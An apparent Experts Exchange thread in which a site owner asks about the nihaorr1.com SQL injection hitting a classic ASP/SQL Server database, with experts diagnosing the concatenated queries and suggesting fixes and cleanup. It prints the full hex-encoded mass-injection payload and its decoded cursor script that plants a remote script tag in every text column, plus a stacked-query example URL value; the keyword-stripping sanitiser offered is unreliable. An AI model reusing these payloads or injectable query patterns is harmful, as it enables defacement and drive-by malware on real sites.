SQL Injection Hack and fix - www.nihaorr1.com/1.js

The script -www.nihaorr1.com/1.js is getting inserted into every record of my organizations SQL db.  I'm the accidental techie in my office, and I'm clueless as to the vulnerability in our code.  After a restore, the site gets hit every other day.  I've searched around and no one seems to have an answer to this specific problem.  There's no doubt in my mind that our coding has a loophole in it somewhere, but I'm not sure what to look for.

I'd appreciate any help!

Thanks,
lou
ldevitoAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Ray PaseurCommented:
Please post your code in clear text so we can see what is going on now and tell you what to change.  There are many ways to reduce the risk of these attacks, but you need to give us your starting point.

Standing by, ~Ray
ldevitoAuthor Commented:
Hi Ray,
Hope this helps...this is in the <head>

Thanks!
<%
%>
<!-- #include file="adovb.asp" -->
<!-- #include file="VOConnect.asp" -->
<!-- #include file="date.asp" -->
<!-- #include file="includes/randomImage.asp" -->
<%
Set mainRS = Server.CreateObject("ADODB.Recordset")
mySQL = "SELECT TOP 4 * FROM events WHERE [date] >= '" & Date() & "' AND (org = 0 OR org = 1) AND highlight is NULL ORDER BY [date] "
mainRS.Open mySQL, DataConn
 
Set middleRS = Server.CreateObject("ADODB.Recordset")
mySQL2 = "SELECT TOP 3 * FROM events WHERE highlight <> 0 AND [date] >= '" & Date() & "' ORDER BY highlight "
middleRS.Open mySQL2, DataConn
 
Set nonvoRS = Server.CreateObject("ADODB.Recordset")
mySQL3 = "SELECT TOP 3 * FROM events WHERE [date] >= '" & Date() & "' AND (org <> 0 AND org <> 1) ORDER BY date "
nonvoRS.Open mySQL3, DataConn
 
%>

Open in new window

ldevitoAuthor Commented:
This is also in another page:
<%@ Language=VBScript %>
<%
If (Instr(1, Request.QueryString("widget"), "true", 1) > 0 ) Then
 
  Server.Transfer("widget.asp")
 
Else
%>
<!-- #INCLUDE file="adovb.asp" -->
<!-- #INCLUDE file="VOconnect.asp" -->
<!-- #INCLUDE file="date.asp" -->
<%
 
myID   = ""
myMon  = ""
myCat  = ""
myPast = ""
myDay = ""
 
myWeek = Date()
myID   = Request.Querystring("id")
myMon  = Request.Form("month")
myDay = Request.Form("date")
 
if Request.Form("month") = "" then myMon = Request.Querystring("month")
myCat = Request.Form("category")
if Request.Form("category") = "" then myCat = Request.Querystring("category")
myPast = Request.Form("past")
if Request.Form("past") = "" then myPast = Request.Querystring("past")
myVen = Request.Form("venonly")
if Request.Form("venonly") = "" then myVen = Request.Querystring("venonly")
myInt = Request.Form("interest")
if Request.Form("interest") = "" then myInt = Request.Querystring("interest")
myWeek = Request.Form("week")
if Request.Form("week") = "" then myWeek = Request.Querystring("week")
 
if Request.Form("date") = "" then myDay = Request.Querystring("date")
myDay = Request.Form("date")
 
if myID <> "" then
    Set monthRS = Server.CreateObject("ADODB.Recordset")
    mySQL = "SELECT * FROM events WHERE id = " & myID
    monthRS.Open mySQL, DataConn
    myDate = monthRS("date")
    myMonth = ConvDate(monthRS("date"), "%B")
    myYear = Year(monthRS("date"))
 
    Set mainRS = Server.CreateObject("ADODB.Recordset")
    mySQL2 = "SELECT * FROM events WHERE id = " & myID
    mainRS.Open mySQL2, DataConn
end if
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
if myMon <> "" AND myCat <> "" then
    myMonth = Month(myMon)
    myYear = Year(myMon)
    'Set how many records per page we want
    NumPerPage = Request.Querystring("numperpage")
 
    if NumPerPage = "" then NumPerPage = 10
        'Retrieve what page we're currently on
 
    If Request.QueryString("CurPage") = "" then
        CurPage = 1 'We're on the first page
    Else
        CurPage = Request.QueryString("CurPage")
    End If
 
    Set mainRS = Server.CreateObject("ADODB.Recordset")
    'Set the cursor location property
    mainRS.CursorLocation = adUseClient
    'Set the cache size = to the # of records/page
    mainRS.CacheSize = NumPerPage
    'Open our recordset
    mySQL2 = "SELECT * FROM events WHERE (Month(date) = " & myMonth & ") AND category = " & myCat & "  AND (Year(date) = '" & myYear & "') "
 
    if myPast = "" then mySQL2 = mySQL2 & " AND [date] >= '" & Date() & "' "
    if myVen <> "" then mySQL2 = mySQL2 & " AND (org = 1 OR org = 0) "
 
    mySQL2 = mySQL2 & " ORDER BY [date] "
    mainRS.Open mySQL2, DataConn
 
    if mainRS.EOF and mainRS.BOF then
        ' Do Nothing
 
    else
        mainRS.MoveFirst
        mainRS.PageSize = NumPerPage
        'Get the max number of pages
        TotalPages = mainRS.PageCount
        'Set the absolute page
        mainRS.AbsolutePage = CurPage
        'Counting variable for our recordset
        myMonth = ConvDate(mainRS("date"), "%B")
        myYear = Year(mainRS("date"))
    end if
 
    Set catRS = Server.CreateObject("ADODB.Recordset")
    mySQL3 = "SELECT category FROM categories WHERE id = " & myCat
    catRS.Open mySQL3, DataConn
    myCatName = catRS("category")
end if
 
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 
if myMon <> "" AND myCat = "" then
    myMonth = Month(myMon)
    myYear = Year(myMon)
    'Set how many records per page we want
    NumPerPage = Request.Querystring("numperpage")
 
    if NumPerPage = "" then NumPerPage = 10
 
    'Retrieve what page we're currently on
 
    If Request.QueryString("CurPage") = "" then
        CurPage = 1 'We're on the first page
 
    Else
        CurPage = Request.QueryString("CurPage")
 
    End If
 
    Set mainRS = Server.CreateObject("ADODB.Recordset")
    'Set the cursor location property
    mainRS.CursorLocation = adUseClient
    'Set the cache size = to the # of records/page
    mainRS.CacheSize = NumPerPage
    'Open our recordset
    mySQL2 = "SELECT * FROM events WHERE (Month(date) = '" & myMonth & "') AND (Year(date) = '" & myYear & "')"
 
    if myPast = "" then mySQL2 = mySQL2 & " AND [date] >= '" & Date() & "' "
    if myVen <> "" then mySQL2 = mySQL2 & " AND (org = 1 OR org = 0) "
 
    mySQL2 = mySQL2 & " ORDER BY [date] "
    mainRS.Open mySQL2, DataConn
 
    if mainRS.BOF and mainRS.EOF then
        ' Do Nothing
 
    else
        mainRS.MoveFirst
        mainRS.PageSize = NumPerPage
        'Get the max number of pages
        TotalPages = mainRS.PageCount
        'Set the absolute page
        mainRS.AbsolutePage = CurPage
        'Counting variable for our recordset
        myMonth = ConvDate(mainRS("date"), "%B")
        myYear = Year(mainRS("date"))
    end if
 
end if
 
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 
if myCat <> "" AND myMon = "" then
    'myMonth = Month(myMon)
    'myYear = Year(myMon)
    'Set how many records per page we want
    NumPerPage = Request.Querystring("numperpage")
 
    if NumPerPage = "" then NumPerPage = 10
    'Retrieve what page we're currently on
 
    If Request.QueryString("CurPage") = "" then
        CurPage = 1 'We're on the first page
 
    Else
        CurPage = Request.QueryString("CurPage")
    End If
 
    Set mainRS = Server.CreateObject("ADODB.Recordset")
    'Set the cursor location property
    mainRS.CursorLocation = adUseClient
    'Set the cache size = to the # of records/page
    mainRS.CacheSize = NumPerPage
    'Open our recordset
    mySQL2 = "SELECT * FROM events WHERE category = " & myCat & " "
 
    if myPast = "" then mySQL2 = mySQL2 & " AND [date] >= '" & Date() & "' "
    if myVen <> "" then mySQL2 = mySQL2 & " AND (org = 1 OR org = 0) "
 
    mySQL2 = mySQL2 & " ORDER BY [date] "
    mainRS.Open mySQL2, DataConn
 
    if mainRS.BOF and mainRS.EOF then ' Do Nothing
 
    else
        mainRS.MoveFirst
        mainRS.PageSize = NumPerPage
        'Get the max number of pages
        TotalPages = mainRS.PageCount
        'Set the absolute page
        mainRS.AbsolutePage = CurPage
        'Counting variable for our recordset
        Set catRS = Server.CreateObject("ADODB.Recordset")
        mySQL3 = "SELECT category FROM categories WHERE id = " & myCat
        catRS.Open mySQL3, DataConn
        myCatName = catRS("category")
    end if
 
end if
 
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 
if myInt <> "" then
    'Set how many records per page we want
    NumPerPage = Request.Querystring("numperpage")
 
    if NumPerPage = "" then NumPerPage = 10
    'Retrieve what page we're currently on
 
    If Request.QueryString("CurPage") = "" then
        CurPage = 1 'We're on the first page
    Else
        CurPage = Request.QueryString("CurPage")
    End If
 
    Set mainRS = Server.CreateObject("ADODB.Recordset")
    'Set the cursor location property
    mainRS.CursorLocation = adUseClient
    'Set the cache size = to the # of records/page
    mainRS.CacheSize = NumPerPage
    'Open our recordset
    mySQL2 = "SELECT * FROM events WHERE [date] >= '" & Date() & "' AND (interest = " & myInt & " OR interest2 = " & myInt & " OR interest3 = " & myInt & ") "
 
    if myPast = "" then mySQL2 = mySQL2 & " AND [date] >= '" & Date() & "' "
    if myVen <> "" then mySQL2 = mySQL2 & " AND (org = 1 OR org = 0) "
    mySQL2 = mySQL2 & " ORDER BY [date] "
    mainRS.Open mySQL2, DataConn
    if mainRS.BOF and mainRS.EOF then
        ' Do Nothing
    else
        mainRS.MoveFirst
        mainRS.PageSize = NumPerPage
        'Get the max number of pages
        TotalPages = mainRS.PageCount
        'Set the absolute page
        mainRS.AbsolutePage = CurPage
        'Counting variable for our recordset
    end if
 
end if
 
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 
if myWeek <> "" then
    myStartDate = Date()
    myStartDate = myWeek
    myEndDate = DateAdd("d", 6, myStartDate)
    Set mainRS = Server.CreateObject("ADODB.Recordset")
    mySQL2 = "SELECT * FROM events WHERE [date] >= '" & myStartDate & "' AND [date] <= '" & myEndDate & "' "
 
    if myVen <> "" then mySQL2 = mySQL2 & " AND (org = 1 OR org = 0) "
 
    mySQL2 = mySQL2 & " ORDER BY [date] "
    mainRS.Open mySQL2, DataConn
    myWeek1start = Session("myWeek1start")
    myWeek2start = Session("myWeek2start")
    myWeek3start = Session("myWeek3start")
    myWeek4start = Session("myWeek4start")
    myWeek5start = Session("myWeek5start")
    myWeek6start = Session("myWeek6start")
    myWeek1end = myWeek1start + 6
    myWeek2end = myWeek2start + 6
    myWeek3end = myWeek3start + 6
    myWeek4end = myWeek4start + 6
    myWeek5end = myWeek5start + 6
    myWeek6end = myWeek6start + 6
end if
 
%>

Open in new window

Announcing the Winners!

The results are in for the 15th Annual Expert Awards! Congratulations to the winners, and thank you to everyone who participated in the nominations. We are so grateful for the valuable contributions experts make on a daily basis. Click to read more about this year’s recipients!

Ray PaseurCommented:
ldevito, I read these code segments and I'm pretty sure it's not happening here.  I didn't see anything but SELECT statements in this code, and while I admit I did not read every line exhaustively, it appears the data base updates are being done somewhere else.

Presumably, that script www.nihaorr1.com/1.js is getting inserted into some kind of a character field in the data base, right?  If so, scan your code for references to the field name in INSERT or UPDATE queries.

Next, step backward to the script that receives the HTML form input that is used to populate that character field.  You want to add some kind of editing controls to prevent that field from getting unwanted input.  

If this were PHP I could stop the attacks for you instantly, but since it's not PHP, I will have to tell you a "pidgin" way to stop this.  I am assuming you want input only from humans.  If you have other scripts that are supposed to be able to post to your pages, you need more information and possibly a link-back confirmation (like what PayPal uses).  But this strategy will almost certainly stop the attacks you're getting.

In the script that creates the HTML for form input, create a random string.  
Store it in the Session("myFormToken") and place it in the form with
<input type=hidden name=myFormToken value=[random string] />

In the script that accepts the form input, test the variable myFormToken against Session("myFormToken") and if they are not equal, kill the script.

You may also want to read and follow the work of this fellow:
http://shiflett.org/blog/2005/jan/xss-cheatsheet

HTH, ~Ray
Ray PaseurCommented:
One other note... You are not alone (if that's any consolation)...
http://www.google.com/search?hl=en&q=whois+nihaorr1.com

Good luck, ~Ray
ldevitoAuthor Commented:
Thanks Ray!  I started looking around more, and below's code is from the only page with a form reference...
<%
myRadio = Request.Form("radio")
%>
 
<input name="radio" type="radio" value="week" onclick="this.form.submit()" <%if myRadio = "week" or myRadio = "" then%>checked<%end if%>>
                      by week
                      <input type="radio" name="radio" value="month" onclick="this.form.submit()"<%if myRadio = "month" then%>checked<%end if%>>
                      by month</nobr>
                    </form>
                    <%
myInc = 0
dtmdate = Date()
myDay = ConvDate (dtmDate, "%A")
if  myDay = "Monday" then myInc = -3
if  myDay = "Tuesday" then myInc = -4
if  myDay = "Wednesday" then myInc = -5
if  myDay = "Thursday" then myInc = -6
if  myDay = "Friday" then myInc = 0
if  myDay = "Saturday" then myInc = -1
if  myDay = "Sunday" then myInc = -2
myStart = Date() + myInc
myWeek1start = myStart
myWeek1end = myWeek1start + 6
myWeek2start = myWeek1end + 1
myWeek2end = myWeek2start + 6
myWeek3start = myWeek2end + 1
myWeek3end = myWeek3start + 6
myWeek4start = myWeek3end + 1
myWeek4end = myWeek4start + 6
myWeek5start = myWeek4end + 1
myWeek5end = myWeek5start + 6
myWeek6start = myWeek5end + 1
myWeek6end = myWeek6start + 6
Session("myWeek1start") = myWeek1start
Session("myWeek2start") = myWeek2start
Session("myWeek3start") = myWeek3start
Session("myWeek4start") = myWeek4start
Session("myWeek5start") = myWeek5start
Session("myWeek6start") = myWeek6start
%> <form name="form2" method="post" action="activityresults.asp">
                      <% if myRadio = "week" or myRadio = "" then %>
                      <select style="font-size: 12px; font-family: arial;" name="week" id="select2">
                        <option value="<%Response.Write(myWeek1start)%>">
                        <%Response.Write(myWeek1start)%>
                        -
                        <%Response.Write(myWeek1end)%>
                        </option>
                        <option value="<%Response.Write(myWeek2start)%>">
                        <%Response.Write(myWeek2start)%>
                        -
                        <%Response.Write(myWeek2end)%>
                        </option>
                        <option value="<%Response.Write(myWeek3start)%>">
                        <%Response.Write(myWeek3start)%>
                        -
                        <%Response.Write(myWeek3end)%>
                        </option>
                        <option value="<%Response.Write(myWeek4start)%>">
                        <%Response.Write(myWeek4start)%>
                        -
                        <%Response.Write(myWeek4end)%>
                        </option>
                        <option value="<%Response.Write(myWeek5start)%>">
                        <%Response.Write(myWeek5start)%>
                        -
                        <%Response.Write(myWeek5end)%>
                        </option>
                        <option value="<%Response.Write(myWeek6start)%>">
                        <%Response.Write(myWeek6start)%>
                        -
                        <%Response.Write(myWeek6end)%>
                        </option>
                      </select>
                      <%
else
Set months2RS = Server.CreateObject("ADODB.Recordset")
mySQL10 = "SELECT * FROM months ORDER BY startdate "
months2RS.Open mySQL10, DataConn
%>
                      <select style="font-size: 12px; font-family: arial;" name="month" id="select2">
                        <% Do While Not months2RS.EOF %>
                        <option value="<%=months2RS("startdate")%>"><%=months2RS("month")%></option>
                        <% months2RS.MoveNext
Loop
end if%>
                      </select>
                      <br>
                      <input name="venonly" type="checkbox" id="venonly" value="checkbox" checked>
                      <font size="1">Venture Outdoors activities only</font><br>
                      <br>
                      <input type=image src="images/SearchButtons/SearchByDate.gif" name="Submit2" value="Search by Date">
 
                    </form></td>
                </tr>
              </table>
            </td>
            <td valign="top">
<div align="center"><strong><font color="#FF0000">OR</font></strong></div></td>
            <td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
                <tr>
                  <td bgcolor="#0066CC" class="whitetext"><div align="center">Search
                      by Activity</div></td>
                </tr>
                <tr>
                  <td class="blueborder">
<form name="form3" method="post" action="activityresults.asp">
              <%
Set cats2RS = Server.CreateObject("ADODB.Recordset")
mySQL11 = "SELECT * FROM categories "
cats2RS.Open mySQL11, DataConn
%>
              <form name="form3" method="post" action="activityresults.asp">
                <p>
                  <select style="font-size: 12px; font-family: arial;" name="category" id="category" size="1">
                    <% Do While Not cats2RS.EOF %>
                    <option value="<%=cats2RS("id")%>"><%=cats2RS("category")%></option>
                    <% cats2RS.MoveNext
Loop %>
                  </select>
                  <br>
                  <input name="venonly" type="checkbox" id="venonly" value="checkbox" checked>
                <font size="1">Venture Outdoors activities only</font></p>
                <p>&nbsp;</p>
                      <p>
<input type=image src="images/SearchButtons/SearchByActivity.gif" name="Submit2" value="Search by Date">
                      </p>
              </form>
</td>
                </tr>
              </table>
            </td>
            <td valign="top">
<div align="center"><strong><font color="#FF0000">OR</font></strong></div></td>
            <td valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
                <tr>
                  <td bgcolor="#0066CC" class="whitetext"><div align="center">Search
                      by Interest Group</div></td>
                </tr>
                <tr>
                  <td class="blueborder">
 <%
Set interestRS = Server.CreateObject("ADODB.Recordset")
mySQL12 = "SELECT * FROM interest ORDER BY name "
interestRS.Open mySQL12, DataConn
%>
              <form name="form4" method="post" action="activityresults.asp">
                <p>
                  <select style="font-size: 12px; font-family: arial;" name="interest" id="select4">
                    <% Do While Not interestRS.EOF %>
                    <option value="<%=interestRS("id")%>"><%=interestRS("name")%></option>
                    <% interestRS.MoveNext
Loop %>
                  </select>
                  <br>
                  <input name="venonly" type="checkbox" id="venonly" value="checkbox" checked>
                <font size="1">Venture Outdoors activities only</font></p>
                <p>&nbsp;</p>
                      <p>
<input type=image src="images/SearchButtons/SearchByInterest.gif" name="Submit2" value="Search by Date">
                      </p>
              </form>
</td>
                </tr>
              </table>
            </td>
          </tr>
        </table>
        <form name="form1" method="post" action="activityresults.asp">
          <table width="100%" border="1" cellpadding="3" cellspacing="0">
            <tr>
              <td><div align="center">
                  <p><font color="#000000"><strong>View Past Events</strong></font></p>
                  <p>By month:
                    <select style="font-size: 12px; font-family: arial;" name="month" id="select">
                      <%
currentdate = Date()
myMonthS = Month(currentdate)
myYearS = Year(currentdate)
myDateS = ""&myMonthS&"/1/"&myYearS&""
For m = 0 to 11
myDateS = ""&myMonthS&"/1/"&myYearS&""
myMonthNameS = ConvDate (myDateS, "%B")
%>
                      <option value="<%Response.Write(myDateS)%>">
                      <%Response.Write(myMonthNameS)%>
                      &nbsp;
                      <%Response.Write(myYearS)%>
                      </option>
                      <%
myMonthS = myMonthS - 1
if myMonthS = 0 then
myMonthS = 12
myYearS = myYearS - 1
end if
Next %>
                    </select>
                    By category:
                    <select style="font-size: 12px; font-family: arial;" name="category" id="select3" size="1">
                      <option value=""<%if myCat = "" then%>selected<%end if%>>All</option>
                      <% cats2RS.MoveFirst
Do While Not cats2RS.EOF %>
                      <option value="<%=cats2RS("id")%>"
<%if Int(myCat) = cats2RS("id") then%>selected<%end if%>><%=cats2RS("category")%></option>
                      <% cats2RS.MoveNext
Loop %>
                    </select>
                    <br>
                    <input name="venonly22" type="checkbox" id="venonly2" value="checkbox" checked>
                    <font size="1">Search only Venture Outdoors Activities<br>
                    </font>
                    <input type="hidden" name="past" value="1">
                    <input type="submit" name="Submit22" value="List Activities">
                  </p>
                </div>
                </td>
            </tr>
          </table>
        </form>

Open in new window

thorv71DeveloperCommented:
I got this good SOLUTION from: http://www.webhostingtalk.com/showthread.php?t=686032&page=2

I think that blocking access to syscolumns and sysobjects tables for the website's user account should do the trick I think. There shouldn't be any problems with this unless your website is using those tables for something.

You can also block access to the following IPs and domains
IPs

60.172.219.4
24.28.193.9
219.153.46.28

Domains
aspder.com
*.aspder.com
nihaorr1.com
*.nihaorr1.com
414151.com
*.414151.com

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
Ray PaseurCommented:
The point of the solution at the webhostingtalk page that thorv71 mentioned is summed up in this quote: "What I did to fix this was to check the input coming in via form or querystring..."

You MUST filter your input.  You cannot rely on blocking IPs or domains (the attacker will move).  Checking for unique errors is like that game of Whack-A-Mole - you will never get them all.

Instead, establish clear criteria for each data field that can be received into your script.  Must it be a text string?  What characters can it have?  How log can it be?  Is it a number?  Can it be a negative number?

The phrase, "filter input, escape output" is often said as the mantra of online security 101.  Older applications often ignored these issues, and when we take over old applications, the first thing our company does is go straight to the form processing to see what filtering is taking place.  You would be amazed at the holes in the code.  In about half of them you can get MySQL to execute a DROP command!

Anyway, as you go forward, be sure the data your scripts accept comes from human beings, and filter your input.  If you're the "accidental" tech support resource for your company, consider getting professional support ASAP.  It will save you a world of misery.  This Chinese joker that is attacking you shows just one example of the vulnerability.  You can bet there are others.  

To sum up, I would say that your post is not a question, so much as a need for an application rewrite, using modern professional best practices. Good luck, ~Ray
ManuTHEOCommented:
Hello,

We had the same problem and we found in the log IIS Sever this code. In fact, this code will update your tables that contain columns string after reading the "sysobject" view of your base .
       
We must reject the reading of this view (and the other system view)  to all users on your base (because anyway, it is not necessary).

Manu
---- HEXADECIMAL CODE ----
DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000));
PRINT @S
---- HEXADECIMAL CODE ----
 
----  ASCII CODE ----
DECLARE @T varchar(255),@C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
select a.name,b.name 
from sysobjects a,syscolumns b 
where a.id=b.id 
and a.xtype='u' 
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.nihaorr1.com/1.js></script>''') 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
----  ASCII CODE ----

Open in new window

MatthewDobsonCommented:
I too have been caught by this SQL Injection attack on my Windows Server 2003, not hit too hard though.

This attack is more harmful than meets the eye. By adding the SCRIPT tags to the SQL server, this link appears on the page of various websites, when the text is retreived from the server. On the client PC the script file opens various iframes and scripts and appears to download some active code and simultaniously attempts to hijack a tunnel to the local pc. I believe it tries to install an addin, but can't be sure as I paniced when it started to download and my AntiVirus/Firewall popped up a warning that www.nihaorr1.com was trying to connect to my PC on a TCP high port (51926).

The moral of this story is that SQL injection is becoming more advanced and automated, so make sure you validate all variables when building your SQL string. Or use alternative methods of creating queries, like the ASP ADO SQLCommand, as I will be in future...
jasonhick70Commented:
Hi, I've also just had this happen on my site too. Fortunately it wasn't too bad, we restored a db backup that had been made just a few hours earlier.

What i'd like to know how to do though is revoke the read permission of sysobjects. I've used the following: REVOKE SELECT ON sys.sysobjects FROM [username]
but I'm able to run select * from sys.objects! ANy help would be most appreciated!

Thanks, Jason
thorv71DeveloperCommented:
It is not enough too set read permission on sysobject, you have to take care of this in your code. Just read on the link below about sql injection, and you will see how easy there is to hack your database with or without permission to sysobject.

I think the best way is to you use request.querystring and check that the string don't have commands that can use your sql statement illegal. You can eks. check for -- and ; and eks update, insert, +++

http://www.securiteam.com/securityreviews/5DP0N1P76E.html
Brendt HessSenior DBACommented:
This is a fairly straight forward injection vulnerability, based around statements like this one in your code:

mySQL = "SELECT * FROM events WHERE id = " & myID


Since myID comes from the URL, it is possible to hack that value with code like:

&myID=1;UPDATE CUSTOMERS SET Password = 'ICanAccessThisNow'; SELECT * FROM Customers;--  

(URLEncode this as needed - I'm too lazy to do so right now :)

This is a simple example (who keeps a password in the Customers file, after all ;), but the one injecting dubdubdub.nihaorr1.com scripts is more sophisticated, including variables, a CAST of a hex string, and an EXEC of that string.  It's out there quite a lot now (over 500k sites show the strings in a Google search now), and has hit all sorts of sites, including the U.S. Dep't of Homeland Security.

Simple fixes, such as removing semicolons and doubling up single quotes in parameters can keep the vast majority of these attacks from succeeding.
ldevitoAuthor Commented:
Thank you for all of your help.  Can any of you offer advice or a starting point to have my form validate content...with request.querystring...

Or can you let me know the cost of having someone with more skills than I to come in and fix it...

thanks


mackdanielsCommented:
Just a quick note to everyone.
This is a SQL Injection Attack. Typically this is done through your form fields during a submit.
You can google this -SQL Injection Attack-.and find endless advice.
HOWEVER - This attack is on the parameters used in your UL strings like:
../DisplayGrid.asp?sort=fname
The attack will see the Name:Value pair in the URL and substitute the malicious SQL string in the Value parameter.
I always take the stance that ALL USER INPUT IS EVIL.
I have attached a snippet of a common code block I use to clean out SQL operators and keywords as well as single quotes, ampersands, etc.....
I use this for all inputs, for example:
strFirstName = CleanseSQL (Request.Form(FirstName))
strSort = CleanseSQL(Request.QueryString(sort))

I hope this helps&&
Mack Daniels


'***************************************************************************
' function: CleanseSQL - Cleanse the variables for malicious SQL insertions
'***************************************************************************
Function CleanseSQL(strString)
    strString = trim(strString)
    strString = Replace(strString, "'", "''")
    strString = Replace(strString, ",", "")
    strString = Replace(strString, "`", "")
    strString = Replace(strString, "&", "And")
    strString = Replace(strString, "=", "")
    strString = Replace(strString, "--", "")
    strString = Replace(strString, ";", "")
    strString = Replace(strString, "declare", "")
    strString = Replace(strString, "select", "")
    strString = Replace(strString, "drop", "")
    strString = Replace(strString, "insert", "")
    strString = Replace(strString, "delete", "")
    strString = Replace(strString, "update", "")
    strString = Replace(strString, "xp_", "")
    strString = Replace(strString, "dt_", "")
    strString = Replace(strString, "sp_", "")
    strString = Replace(strString, "sysobjects", "")
    strString = Replace(strString, "syscolumns", "")
    CleanseSQL = strString
 End Function
gummisjCommented:
gummisjCommented:
I think you should check this also.
http://www.modsecurity.org/blog/archives/2008/01/sql_injection_a.html

sorry about 2 posts
gummisjCommented:
this works to filter this out. i got the same problem few days ago then i added this function to my toppage and it works 100%

http://blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx
TNetworksCommented:
Here's a script to clean an entire database, using just about the same code used for the injection.  It replaces the value with nothing leaving the original value.
DECLARE @T varchar(255),@C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
select a.name,b.name 
from sysobjects a,syscolumns b 
where a.id=b.id 
and a.xtype='u' 
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+'] = replace(rtrim(convert(varchar,['+@C+'])),''<script src=http://www.nihaorr1.com/1.js></script>'','''')')
select @T as tble, @C as clmn 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

Open in new window

It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
MySQL Server

From novice to tech pro — start learning today.